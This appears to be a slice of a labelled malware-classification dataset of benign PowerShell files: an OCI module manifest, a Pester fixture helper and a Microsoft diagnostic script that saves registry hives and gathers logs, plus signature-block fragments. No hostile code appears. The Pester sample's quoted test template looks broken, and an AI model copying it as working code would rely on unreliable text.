bS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNV // SIG // HSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4K // SIG // AFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/ // SIG // BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2U // SIG // kFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8v // SIG // Y3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0 // SIG // cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI // SIG // KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v // SIG // d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jv // SIG // b0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0B // SIG // AQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwU // SIG // tj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTC // SIG // j/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+ // SIG // iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhT // SIG // dSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYS // SIG // EhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qB // SIG // woEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0 // SIG // DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxy // SIG // bxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARx // SIG // v2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+k // SIG // KNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2 // SIG // tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4 // SIG // O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL // SIG // jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm // SIG // dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/Z // SIG // cGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggLUMIIC // SIG // PQIBATCCAQChgdikgdUwgdIxCzAJBgNVBAYTAlVTMRMw // SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt // SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp // SIG // b24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w // SIG // ZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVz // SIG // IFRTUyBFU046M0JENC00QjgwLTY5QzMxJTAjBgNVBAMT // SIG // HE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WiIwoB // SIG // ATAHBgUrDgMCGgMVAPeNohrmBa7BOMM1g3fORKTOkYsK // SIG // oIGDMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG // SIG // A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw // SIG // MTAwDQYJKoZIhvcNAQEFBQACBQDpil0/MCIYDzIwMjQw // SIG // MjI5MDkzMjQ3WhgPMjAyNDAzMDEwOTMyNDdaMHQwOgYK // SIG // KwYBBAGEWQoEATEsMCowCgIFAOmKXT8CAQAwBwIBAAIC // SIG // BeEwBwIBAAICIZYwCgIFAOmLrr8CAQAwNgYKKwYBBAGE // SIG // WQoEAjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgCAQACAweh // SIG // IKEKMAgCAQACAwGGoDANBgkqhkiG9w0BAQUFAAOBgQCD // SIG // 2ogPjgexHt1hw/2WTZoEIzAKI6P2fOTl22XAArU4aC37 // SIG // O0ykD3LJf0ycYRu2gAJfBdi21GmK+t2oc7lZkzNdb0az // SIG // skDepJNLuuUCJZ6NbFK8RLIkfGQOPEOo+4O2cF08IVXw // SIG // bxdCrO+PmYrXkYfC8g8ToubS6A0nwnNxak5jpzGCBA0w // SIG // ggQJAgEBMIGTMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI // SIG // EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w // SIG // HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAk // SIG // BgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAy // SIG // MDEwAhMzAAAB5Y9qwPM9tAujAAEAAAHlMA0GCWCGSAFl // SIG // AwQCAQUAoIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcN // SIG // AQkQAQQwLwYJKoZIhvcNAQkEMSIEICDPV776kNQcZYky // SIG // aTpdf4eZGdBI+IuritbOA7qmuL6oMIH6BgsqhkiG9w0B // SIG // CRACLzGB6jCB5zCB5DCBvQQgFanT//6o8RhYXtmG6BF3 // SIG // m/CP6QKH9NQsIW8VB/VOve0wgZgwgYCkfjB8MQswCQYD // SIG // VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G // SIG // A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 // SIG // IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg // SIG // VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeWPasDzPbQL // SIG // owABAAAB5TAiBCAW2pWvtza2HKf7K/diFNqQT/UA7/NS // SIG // zKYnlJNtyS6cgTANBgkqhkiG9w0BAQsFAASCAgBSu6Rm // SIG // 8G5jJIPNtBtrLCucoWpczPyPQCT0VRfpmSaQHNne1kRf // SIG // QDpaKrhwvKtG+i7Oxa68OTGrcAaNvxH8QdbLqswqnXQK // SIG // tyCCIxM8mW9y94Ew46EMIxFylsBy4hnRb/f0DDc90Edi // SIG // XGsqItqJd+nxIbD/yW+V5ojwRFovRRJ5qzf60HGRpqib // SIG // DM3bmNVrmKpy4f6iuhQWA8AouxN+ZUsx6swgB860Hwpb // SIG // 7hEbIjCujB7+6xk+7q5Vny2OJKwomKkG/460HKYbhINc // SIG // 3+P7oX5xCrruME6pE35jqjGiV5DsNr6Dgtw3zT9TP5u0 // SIG // yzSpQa2b7ESF2+SPSwrjDinLqlPPkX/3QHd5AL0Ep2zm // SIG // BkGFyyYT+yag6GC0sHm6xoPwRLLb5yi1RImNL5grrV9N // SIG // tD6wLlqPCW4eoMh1JsuaJTKL1vq2YA2ygA+5QxGQL3Ri // SIG // 6i4heW2gSPDPbo+q4k9ZQVt51hovJgzdiQh6yj3+AKH8 // SIG // y8a3niNBuEM/bybk5ZwcyseAGMT4ZsFC9oe/sdQooE4J // SIG // GSui6fyMJZmtLw/0Jr2+b5Zy/pUnfe9ICuo2jRr4bjs6 // SIG // PUcv6YMmajFJ/7/yVrmkeKPHmW5TkAuez5Z3XIK5xuFd // SIG // PM4D/E+Z7l5ZnMPQ0NXY2EIs60GzTOfYQiuelLnKMHH9 // SIG // b2fh1nujTEqX87ik3Q== // SIG // End signature block
combined_dataset/train/non-malicious/sample_58_22.ps1
sample_58_22.ps1
# # Module manifest for module 'OCI.PSModules.Jmsjavadownloads' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Jmsjavadownloads.dll' # Version number of this module. ModuleVersion = '84.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'a83f9369-1d29-4c1c-8c1d-33e3f88d0bf3' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Jmsjavadownloads Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '84.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Jmsjavadownloads.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIJmsjavadownloadsJavaDownloadRecordsList', 'Get-OCIJmsjavadownloadsJavaDownloadReport', 'Get-OCIJmsjavadownloadsJavaDownloadReportContent', 'Get-OCIJmsjavadownloadsJavaDownloadReportsList', 'Get-OCIJmsjavadownloadsJavaDownloadToken', 'Get-OCIJmsjavadownloadsJavaDownloadTokensList', 'Get-OCIJmsjavadownloadsJavaLicense', 'Get-OCIJmsjavadownloadsJavaLicenseAcceptanceRecord', 'Get-OCIJmsjavadownloadsJavaLicenseAcceptanceRecordsList', 'Get-OCIJmsjavadownloadsJavaLicensesList', 'Get-OCIJmsjavadownloadsWorkRequest', 'Get-OCIJmsjavadownloadsWorkRequestErrorsList', 'Get-OCIJmsjavadownloadsWorkRequestLogsList', 'Get-OCIJmsjavadownloadsWorkRequestsList', 'Invoke-OCIJmsjavadownloadsRequestSummarizedJavaDownloadCounts', 'New-OCIJmsjavadownloadsArtifactDownloadUrl', 'New-OCIJmsjavadownloadsJavaDownloadReport', 'New-OCIJmsjavadownloadsJavaDownloadToken', 'New-OCIJmsjavadownloadsJavaLicenseAcceptanceRecord', 'Remove-OCIJmsjavadownloadsJavaDownloadReport', 'Remove-OCIJmsjavadownloadsJavaDownloadToken', 'Remove-OCIJmsjavadownloadsJavaLicenseAcceptanceRecord', 'Stop-OCIJmsjavadownloadsWorkRequest', 'Update-OCIJmsjavadownloadsJavaDownloadToken', 'Update-OCIJmsjavadownloadsJavaLicenseAcceptanceRecord' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Jmsjavadownloads' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/3025.ps1
3025.ps1
function New-Fixture { param ( [String]$Path = $PWD, [Parameter(Mandatory = $true)] [String]$Name ) $Name = $Name -replace '.ps1', '' $scriptCode = "function $Name {$([System.Environment]::NewLine)$([System.Environment]::NewLine)}" $testCode = '$here = Split-Path -Parent $MyInvocation.MyCommand.Path $sut = (Split-Path -Leaf $MyInvocation.MyCommand.Path) -replace ''\.Tests\.'', ''.'' . "$here\$sut" Describe " It "does something useful" { $true | Should -Be $false } }' -replace " $Path = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path) Create-File -Path $Path -Name "$Name.ps1" -Content $scriptCode Create-File -Path $Path -Name "$Name.Tests.ps1" -Content $testCode } function Create-File ($Path, $Name, $Content) { if (-not (& $SafeCommands['Test-Path'] -Path $Path)) { & $SafeCommands['New-Item'] -ItemType Directory -Path $Path | & $SafeCommands['Out-Null'] } $FullPath = & $SafeCommands['Join-Path'] -Path $Path -ChildPath $Name if (-not (& $SafeCommands['Test-Path'] -Path $FullPath)) { & $SafeCommands['Set-Content'] -Path $FullPath -Value $Content -Encoding UTF8 & $SafeCommands['Get-Item'] -Path $FullPath } else { Write-Warning "Skipping the file '$FullPath', because it already exists." } }
combined_dataset/train/non-malicious/sample_10_78.ps1
sample_10_78.ps1
#************************************************ # DC_Setup_AppCompat.ps1 # Version 1.0 # Date: 2009-2019 # Author: Walter Eder (waltere@microsoft.com) # Description: Collects additional AppCompat information. # Called from: TS_AutoAddCommands_Setup.ps1 #******************************************************* Trap [Exception] { # Handle exception and throw it to the stdout log file. Then continue with function and script. $Script:ExceptionMessage = $_ "[info]: Exception occurred." | WriteTo-StdOut "[info]: Exception.Message $ExceptionMessage." | WriteTo-StdOut $Error.Clear() continue # later use return to return the exception message to an object: return $Script:ExceptionMessage } Import-LocalizedData -BindingVariable ScriptVariable Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status $ScriptVariable.ID_CTSAddonsDescription $sectionDescription = "Additional Components" # detect OS version $wmiOSVersion = Get-CimInstance -Namespace "root\cimv2" -Class Win32_OperatingSystem [int]$bn = [int]$wmiOSVersion.BuildNumber function isOSVersionAffected { if ([int]$bn -gt [int](9600)) { return $true } else { return $false } } function RunNet ([string]$NetCommandToExecute="") { Write-DiagProgress -Activity $ScriptVariable.ID_CTSSMBClient -Status "net $NetCommandToExecute" $NetCommandToExecuteLength = $NetCommandToExecute.Length + 6 "`n`n`n" + "=" * ($NetCommandToExecuteLength) + "`r`n" + "net $NetCommandToExecute" + "`r`n" + "=" * ($NetCommandToExecuteLength) | Out-File -FilePath $OutputFile -append $CommandToExecute = "cmd.exe /c net.exe " + $NetCommandToExecute + " >> $OutputFile " RunCmD -commandToRun $CommandToExecute -CollectFiles $false "`n`n`n" | Out-File -FilePath $OutputFile -append } function RunPS ([string]$RunPScmd="", [switch]$ft) { $RunPScmdLength = $RunPScmd.Length "-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append "$RunPScmd" | Out-File -FilePath $OutputFile -append "-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append if ($ft) { # This format-table expression is useful to make sure that wide ft output works correctly Invoke-Expression $RunPScmd |format-table -autosize -outvariable $FormatTableTempVar | Out-File -FilePath $outputFile -Width 500 -append } else { Invoke-Expression $RunPScmd | Out-File -FilePath $OutputFile -append } "`n`n`n" | Out-File -FilePath $OutputFile -append } <#----------Copy Components Registry hive -- done in DC_ServicingLogs.ps1 # $ComponentsHivOutputFileName = Join-Path $pwd.path ($ComputerName + "_reg_Components.HIV") # copy $ENV:windir\system32\config\components $ComponentsHivOutputFileName /y $sectionDescription = "Additional Components Registry hive" $OutputFile = $ComputerName + "_reg_Components.HIV" $ComponentsHiv = "$ENV:windir\system32\config\components" if (test-path $ComponentsHiv) { Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Copy $ComponentsHiv" Copy-Item -Path $ComponentsHiv -Destination $OutputFile CollectFiles -filesToCollect $OutputFile -fileDescription "Components Registry hive file" -SectionDescription $sectionDescription } else { "$ComponentsHiv Does not exist" | WriteTo-StdOut } #> #--- Section for things that need to be started early, will check at end of this script if Process has terminated if (isOSVersionAffected) { #write-host -fore cyan "BN=$bn isOSVersionAffected2=True " $sectionDescription = "Additional Components DXdiag" $dxdiagOutputFileName = Join-Path $pwd.path ($ComputerName + "_dxdiag.txt") $CommandToRun = "dxdiag /t $dxdiagoutputFileName" RunCMD -commandToRun $CommandToRun -collectFiles $true #dxdiag takes some number of seconds to write output after completion. -- will check at end Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "...running: dxdiag /t " #$dxdiagID = (Get-Process dxdiag).id <# $i = 0 $maxWasitSec=40 while (-not (Test-Path $dxdiagOutputFileName)) { $i++ if ($i -ge $maxWasitSec) { "[error]: waited for $maxWasitSec seconds for dxdiag output, giving up." | WriteTo-StdOut break } Start-Sleep 1 } collectfiles -filesToCollect $dxdiagOutputFileName -fileDescription "dxdiag output" -sectionDescription "Additional Components DXdiag" #> } #--- Section for App Compat Info Only run if flag set Write-Host "$(Get-Date -UFormat "%R:%S") : Compress App Compat AppPatch Log files" # Command: All logs in %windir%\AppPatch*\CompatAdmin.log $sectiondescription = "Compress AppPatch files" $logFilePath = (join-path $env:SystemRoot "AppPatch\CompatAdmin.log") if (test-path $logFilePath) { Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status $sectiondescription CompressCollectFiles -filesToCollect $logFilePath -Recursive -fileDescription "App Compat Log Files" -sectionDescription $sectiondescription -DestinationFileName "AppCompat_logs.zip" -RenameOutput $true } else { "$logFilePath Does not exist" | WriteTo-StdOut } $sectiondescription = "Compress AppPatch64 files" $logFilePath = (join-path $env:SystemRoot "AppPatch64\CompatAdmin.log") if (test-path $logFilePath) { Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status $sectiondescription CompressCollectFiles -filesToCollect $logFilePath -Recursive -fileDescription "App Compat 64 Log Files" -sectionDescription $sectiondescription -DestinationFileName "AppCompat64_logs.zip" -RenameOutput $true } else { "$logFilePath Does not exist" | WriteTo-StdOut } #----------Event Logs Write-Host "$(Get-Date -UFormat "%R:%S") : App Compat EventLogs" $sectiondescription = "Get EventLog files" # Command: All App Compat EventLogs in %windir%\System32\Winevt\Logs # OutputFileName: AppCompat_*_EventLogs.zip if (test-path $env:SystemRoot\System32\Winevt\Logs\*compatibility*.evtx) { Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get $sectiondescription compatibility*.evtx" CompressCollectFiles -filesToCollect (join-path $env:SystemRoot "System32\Winevt\Logs\*compatibility*.evtx") -Recursive -fileDescription "Get Event Logs" -sectionDescription $sectiondescription -DestinationFileName "AppCompat_evt_compatibility_EventLogs.zip" -RenameOutput $true } if (test-path $env:SystemRoot\System32\Winevt\Logs\*inventory*.evtx) { Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get $sectiondescription *inventory*.evtx" CompressCollectFiles -filesToCollect (join-path $env:SystemRoot "System32\Winevt\Logs\*inventory*.evtx") -Recursive -fileDescription "Get Event Logs" -sectionDescription $sectiondescription -DestinationFileName "AppCompat_evt_inventory_EventLogs.zip" -RenameOutput $true } if (test-path $env:SystemRoot\System32\Winevt\Logs\*program-telemetry*.evtx) { Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get $sectiondescription *program-telemetry*.evtx" CompressCollectFiles -filesToCollect (join-path $env:SystemRoot "System32\Winevt\Logs\*program-telemetry*.evtx") -Recursive -fileDescription "Get Event Logs" -sectionDescription $sectiondescription -DestinationFileName "AppCompat_evt_program-telemetry_EventLogs.zip" -RenameOutput $true } #----------Dir Outputs Write-Host "$(Get-Date -UFormat "%R:%S") : Directory outputs" $sectionDescription = "Dir C:\Program Files\" $OutputFile = Join-Path $pwd.path ($ComputerName + "_AppCompat_Dir_ProgramFiles.txt") Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get $sectiondescription" # RunPS "get-Childitem $ENV:Programfiles -recurse -Exclude *Defender*,*ScriptStore*,*CSC*,*RtBackup* -ErrorAction SilentlyContinue" $CommandToExecute = 'dir /a /s "C:\Program Files\" ' RunCmD -commandToRun ("cmd.exe /c $CommandToExecute >> `"$OutputFile`"") -collectFiles $false collectfiles -filesToCollect $OutputFile -fileDescription "App Compat: Dir C:\Program Files\ output" -sectionDescription $sectionDescription $sectionDescription = "Dir C:\Program Files (x86)\" $OutputFile = Join-Path $pwd.path ($ComputerName + "_AppCompat_Dir_ProgramFilesx86.txt") Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get $sectiondescription" $CommandToExecute = 'dir /a /s "C:\Program Files (x86)" ' RunCmD -commandToRun ("cmd.exe /c $CommandToExecute >> `"$OutputFile`"") -collectFiles $false collectfiles -filesToCollect $OutputFile -fileDescription "App Compat: Dir C:\Program Files (x86)\ output" -sectionDescription $sectionDescription #----------Registry Write-Host "$(Get-Date -UFormat "%R:%S") : Registry outputs, will take minutes..." $AppCompatFlagsKeyHKLM = 'HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags' $OutputFile= $ComputerName + "_AppCompatFlags_Reg_HKLM.txt" Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get AppCompatFlags_Reg_HKLM file" RegQuery -RegistryKeys $AppCompatFlagsKeyHKLM -OutputFile $OutputFile -fileDescription "AppCompatFlags HKLM Reg key" -Recursive $true $AppCompatFlagsKeyHKCU = 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags' $OutputFile= $ComputerName + "_AppCompatFlags_Reg_HKCU.txt" Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get AppCompatFlags_Reg_HKCU file" RegQuery -RegistryKeys $AppCompatFlagsKeyHKCU -OutputFile $OutputFile -fileDescription "AppCompatFlags HKCU Reg key" -Recursive $true $InstallerKey = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Installer' $OutputFile= $ComputerName + "_AppCompat_Reg_WindowsInstaller.txt" Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get Reg_WindowsInstaller file" RegQuery -RegistryKeys $Installerkey -OutputFile $OutputFile -fileDescription "Installer Reg key" -Recursive $true <# $HKCUsoftwareKey = 'HKCU\Software' $OutputFile= $ComputerName + "_reg_HKCU_CurrentUser-Software.txt" Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get HKCU\Software TXT file" RegQuery -RegistryKeys $HKCUsoftwareKey -OutputFile $OutputFile -fileDescription "Reg_CurrentUser-Software Hive TXT file" -Recursive $true $HKLMsoftwareKey = 'HKLM\Software' $OutputFile= $ComputerName + "_reg_HKLM_LocalMachine-Software.txt" Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get HKLM\Software TXT file" RegQuery -RegistryKeys $HKLMsoftwareKey -OutputFile $OutputFile -fileDescription "Reg_LocalMachine-Software Hive TXT file" -Recursive $true #> # much faster to collect .HIV instead of RegQuery / REG EXPORT Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get Reg Software-User.HIV" $OutputFile= $MachineName + "__reg_HKCU-Software-User.HIV" RegSave -RegistryKey "HKCU\Software" -OutputFile $OutputFile -fileDescription "HKCU-Software-User Hive" Write-DiagProgress -Activity $ScriptVariable.ID_CTSAddons -Status "Get Reg Software.HIV" $OutputFile= $MachineName + "__reg_HKLM-Software.HIV" RegSave -RegistryKey "HKLM\Software" -OutputFile $OutputFile -fileDescription "HKLM-Software Hive" #----------End section Write-Host "$(Get-Date -UFormat "%R:%S") : App Compat end section" # Waiting until Process DXdiag completes if (Get-Process -Name DXdiag -EA SilentlyContinue) { Write-Host "$(Get-Date -UFormat "%R:%S") ...waiting max 40 seconds on DXdiag $dxdiagID to complete" #Wait-Process -Id $dxdiagID -Timeout 40 -EA SilentlyContinue Wait-Process -Name DXdiag -Timeout 40 -EA SilentlyContinue collectfiles -filesToCollect $dxdiagOutputFileName -fileDescription "dxdiag output" -sectionDescription "Additional Components DXdiag" } # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCznXlu9o0GFfxx # 1e1OkTSbX89dXBQE9ROkiXgMVmGuV6CCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # 